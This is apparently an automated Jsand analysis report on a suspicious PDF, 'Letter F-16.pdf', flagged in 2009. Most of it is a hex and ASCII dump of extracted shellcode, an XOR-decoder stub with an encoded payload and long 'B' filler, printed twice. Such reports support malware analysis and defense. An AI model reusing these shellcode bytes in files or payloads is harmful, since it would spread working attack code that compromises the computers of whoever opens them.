Analysis report for Letter F-16.pdf

Sample Overview

FileLetter F-16.pdf
MD5ca79bb9846a56e73f6df1bba7854d196
Analysis Started2009-11-26 10:57:44
Report Generated2009-11-26 10:57:47
Jsand version1.03.02

Detection results

DetectorResult
Jsand 1.03.02suspicious

Warning:

  • When analyzing a file (rather than a URL), Jsand does not examine external resources, such as iframes and scripts. In addition, properties such as document.location, document.referer, and document.cookie, which are sometimes used by malicious scripts, are not set.

This may affect the detection of malicious code.

Exploits

No exploits were identified.

Deobfuscation results

Evals

No evals.

Writes

No writes.

Network Activity

Requests

URL
file://Letter F-16.pdf

ActiveX controls

No objects/controls.

Shellcode and Malware

HexadecimalASCII
41 43 49 4b eb 11 fc 5b  4b 33 c9 66 b9 b0 01 80 
34 0b f9 e2 fa eb 05 e8  eb ff ff ff 11 f9 f9 f9 
f9 a3 ac 72 15 78 15 9d  fd f9 f9 72 0d 11 69 f8 
f9 f9 72 01 11 16 f9 f9  f9 70 ff 06 cf 91 54 62 
84 26 11 ed f8 f9 f9 70  bf f5 06 cf 91 d0 eb 3f 
af 11 fc f8 f9 f9 70 bf  e9 06 cf 91 a0 c5 fe 82 
11 0f f9 f9 f9 70 bf ed  06 cf 91 87 21 1b 8a 11 
1e f9 f9 f9 70 bf cd ca  30 12 fa 72 b7 c5 7a 38 
fd a8 93 f9 a8 06 af f5  a0 7a 01 06 8d 09 c4 b9 
e6 f9 f9 8f 10 70 b7 c5  93 f9 93 f9 93 f9 93 fb 
93 f9 06 8f c5 06 af e9  70 bf bd 7a 01 f9 8d 32 
93 f9 93 f9 93 f9 93 fd  06 8f bd 06 af ed 70 bf 
b1 7a 01 f9 8d 4c 78 c1  dc a9 bd bf 72 b7 c5 8c 
54 78 41 f9 eb f9 f9 a9  9d a9 bd 8c 58 78 41 fd 
eb f9 f9 16 07 13 57 8c  6c 40 f9 ff f9 f9 78 15 
f9 f1 f9 f9 af ae 72 09  78 3f e9 eb f9 f9 72 3d 
7a 39 f1 72 01 0a 5d 40  f9 ff f9 f9 b0 b0 b0 b0 
78 cd f1 17 07 07 16 7c  30 8c 08 a6 a7 06 8f c5 
06 8f b1 06 8f bd 06 19  ac af 9d 58 c9 f9 f9 f9 
7c 39 81 ea c7 72 b9 f5  c7 72 89 e5 c7 72 a7 f1 
54 c7 72 91 f1 12 f4 c7  72 b9 cd c7 72 51 41 f9 
f9 f9 ca 22 72 3c a7 a4  3b fd f9 aa ac af ae cf 
72 95 dd e1 cf 72 bc c5  cf 72 ad fc 81 fa 2c c7 
72 b3 e1 c7 72 a3 d9 fa  24 1a c5 b0 c7 72 cd 72 
fa 0c ca 06 05 ca 39 55  c3 3d 8d fe 38 36 f4 fa 
01 12 0b cf c2 85 dd ed  8c 26 72 3b 7a 39 dd c7 
72 e1 fa 24 9f c7 72 f5  b2 c7 72 a3 e5 fa 24 c7 
72 fd 72 fa 3c 12 fb ca  39 72 2c a6 a7 a4 a2 3b 
f1 f9 11 f9 f9 f9 f9 a1  7a 39 fc 3a 
ACIK...[K3.f....
4...............
...r.x.....r..i.
..r......p....Tb
.&.....p.......?
......p.........
.....p......!...
....p...0..r..z8
.........z......
.....p..........
........p..z...2
..............p.
.z...Lx.....r...
TxA.........XxA.
......W.l@....x.
......r.x?....r=
z9.r..]@........
x......|0.......
...........X....
|9...r...r...r..
T.r.....r...rQA.
..."r<..;.......
r....r...r....,.
r...r...$....r.r
......9U.=..86..
.........&r;z9..
r..$..r...r...$.
r.r.<...9r,....;
........z9.:
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 
41 43 49 4b eb 11 fc 5b  4b 33 c9 66 b9 b0 01 80 
34 0b f9 e2 fa eb 05 e8  eb ff ff ff 11 f9 f9 f9 
f9 a3 ac 72 15 78 15 9d  fd f9 f9 72 0d 11 69 f8 
f9 f9 72 01 11 16 f9 f9  f9 70 ff 06 cf 91 54 62 
84 26 11 ed f8 f9 f9 70  bf f5 06 cf 91 d0 eb 3f 
af 11 fc f8 f9 f9 70 bf  e9 06 cf 91 a0 c5 fe 82 
11 0f f9 f9 f9 70 bf ed  06 cf 91 87 21 1b 8a 11 
1e f9 f9 f9 70 bf cd ca  30 12 fa 72 b7 c5 7a 38 
fd a8 93 f9 a8 06 af f5  a0 7a 01 06 8d 09 c4 b9 
e6 f9 f9 8f 10 70 b7 c5  93 f9 93 f9 93 f9 93 fb 
93 f9 06 8f c5 06 af e9  70 bf bd 7a 01 f9 8d 32 
93 f9 93 f9 93 f9 93 fd  06 8f bd 06 af ed 70 bf 
b1 7a 01 f9 8d 4c 78 c1  dc a9 bd bf 72 b7 c5 8c 
54 78 41 f9 eb f9 f9 a9  9d a9 bd 8c 58 78 41 fd 
eb f9 f9 16 07 13 57 8c  6c 40 f9 ff f9 f9 78 15 
f9 f1 f9 f9 af ae 72 09  78 3f e9 eb f9 f9 72 3d 
7a 39 f1 72 01 0a 5d 40  f9 ff f9 f9 b0 b0 b0 b0 
78 cd f1 17 07 07 16 7c  30 8c 08 a6 a7 06 8f c5 
06 8f b1 06 8f bd 06 19  ac af 9d 58 c9 f9 f9 f9 
7c 39 81 ea c7 72 b9 f5  c7 72 89 e5 c7 72 a7 f1 
54 c7 72 91 f1 12 f4 c7  72 b9 cd c7 72 51 41 f9 
f9 f9 ca 22 72 3c a7 a4  3b fd f9 aa ac af ae cf 
72 95 dd e1 cf 72 bc c5  cf 72 ad fc 81 fa 2c c7 
72 b3 e1 c7 72 a3 d9 fa  24 1a c5 b0 c7 72 cd 72 
fa 0c ca 06 05 ca 39 55  c3 3d 8d fe 38 36 f4 fa 
01 12 0b cf c2 85 dd ed  8c 26 72 3b 7a 39 dd c7 
72 e1 fa 24 9f c7 72 f5  b2 c7 72 a3 e5 fa 24 c7 
72 fd 72 fa 3c 12 fb ca  39 72 2c a6 a7 a4 a2 3b 
f1 f9 11 f9 f9 f9 f9 a1  7a 39 fc 3a 
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
ACIK...[K3.f....
4...............
...r.x.....r..i.
..r......p....Tb
.&.....p.......?
......p.........
.....p......!...
....p...0..r..z8
.........z......
.....p..........
........p..z...2
..............p.
.z...Lx.....r...
TxA.........XxA.
......W.l@....x.
......r.x?....r=
z9.r..]@........
x......|0.......
...........X....
|9...r...r...r..
T.r.....r...rQA.
..."r<..;.......
r....r...r....,.
r...r...$....r.r
......9U.=..86..
.........&r;z9..
r..$..r...r...$.
r.r.<...9r,....;
........z9.:

No additional malware was retrieved.